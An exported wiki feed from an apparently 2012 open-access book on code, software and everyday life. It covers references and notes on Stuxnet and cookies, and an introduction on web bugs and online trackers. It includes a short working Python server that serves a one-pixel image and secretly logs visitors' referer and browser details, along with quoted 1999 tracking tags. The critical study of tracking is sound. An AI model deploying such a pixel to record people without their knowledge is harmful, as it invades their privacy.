&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) 'Obama Order Sped Up Wave of Cyberattacks Against Iran', ''The New York Times'', June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R. (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', ''The Next Web'', accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs) and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
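&lt;br /&gt;
To make this mechanism concrete, the following minimal sketch uses Python's standard library to build and parse the relevant headers; the cookie name and values are invented for illustration: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# A minimal sketch of the cookie mechanism note [2] describes. &lt;br /&gt;
from http.cookies import SimpleCookie &lt;br /&gt;
&lt;br /&gt;
# Server side: set a small piece of state (at most 4 KB per cookie). &lt;br /&gt;
cookie = SimpleCookie() &lt;br /&gt;
cookie['session'] = 'abc123' &lt;br /&gt;
cookie['session']['max-age'] = 3600        # expires in one hour &lt;br /&gt;
print(cookie.output())   # 'Set-Cookie: session=abc123; Max-Age=3600' &lt;br /&gt;
&lt;br /&gt;
# Client side: the browser returns the state on every later request, &lt;br /&gt;
# until the cookie expires or is reset by the server. &lt;br /&gt;
returned = SimpleCookie() &lt;br /&gt;
returned.load('session=abc123') &lt;br /&gt;
print(returned['session'].value)           # 'abc123' &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;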
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Worms spread from computer to computer, often across networks, but unlike a virus, a worm is able to transfer itself without requiring any human action. It does so by taking advantage of a computer's file or information transport features, such as its networking setup, which it exploits in order to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may be three versions of the Stuxnet code, revised in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; may stand for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing on the notion of the actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4991</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4991"/>
		<updated>2012-06-21T10:58:06Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological, what I call ''computationality''. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful at penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has caused in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary, kernel within the softwarization project. This potential is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al.'' have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is; for example, 427 million Europeans (or 65 percent) use the Internet, with more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers them.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand, driven by the network effects of digital media, even where we have discounted and backgrounded their importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, this is in reality the condition of the computational environment we increasingly experience, and which I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post)modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. 
That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, yet it nonetheless has concrete effects. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangles which yield only to certain prescribed forms of touch-based interface. Here I am thinking of physical keyboards and trackpads, as much as of haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep - although it is useful to note that theorists such as Frabetti (2010) problematise Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behaviour and send information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were intended to enable webpages and sites to store the current collection of data about a user, or what is called ‘state’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour and collect data and information about users raises important privacy issues, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects that allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user, code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
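&lt;br /&gt;
What the server on the receiving end of such a request does is simple to sketch. The following is a minimal, illustrative reconstruction - not any vendor's actual tracker, and the port is arbitrary - which serves a one-pixel GIF and logs whatever the request itself reveals about the visitor: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
# A minimal sketch of the server side of a web bug: return a 1x1 pixel &lt;br /&gt;
# and log what the request reveals. Illustrative only. &lt;br /&gt;
from http.server import BaseHTTPRequestHandler, HTTPServer &lt;br /&gt;
&lt;br /&gt;
PIXEL = bytes.fromhex('47494638396101000100800000000000ffffff21f9040100000000' &lt;br /&gt;
                      '2c00000000010001000002024401003b')  # 1x1 GIF &lt;br /&gt;
&lt;br /&gt;
class Bug(BaseHTTPRequestHandler): &lt;br /&gt;
    def do_GET(self): &lt;br /&gt;
        # 'Collection': the URL query, referring page and browser &lt;br /&gt;
        # identification arrive with every request for the image. &lt;br /&gt;
        print(self.path, self.headers.get('Referer'), &lt;br /&gt;
              self.headers.get('User-Agent')) &lt;br /&gt;
        self.send_response(200) &lt;br /&gt;
        self.send_header('Content-Type', 'image/gif') &lt;br /&gt;
        self.end_headers() &lt;br /&gt;
        self.wfile.write(PIXEL) &lt;br /&gt;
&lt;br /&gt;
HTTPServer(('', 8000), Bug).serve_forever()  # runs until interrupted &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;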
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique that reduces the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative frequency of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor generates $189 of revenue at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 at [http://www.businessinsider.com/blackboard/google Google] (search), and although Facebook (social networking) generates only $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becoming extremely profitable. 
Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
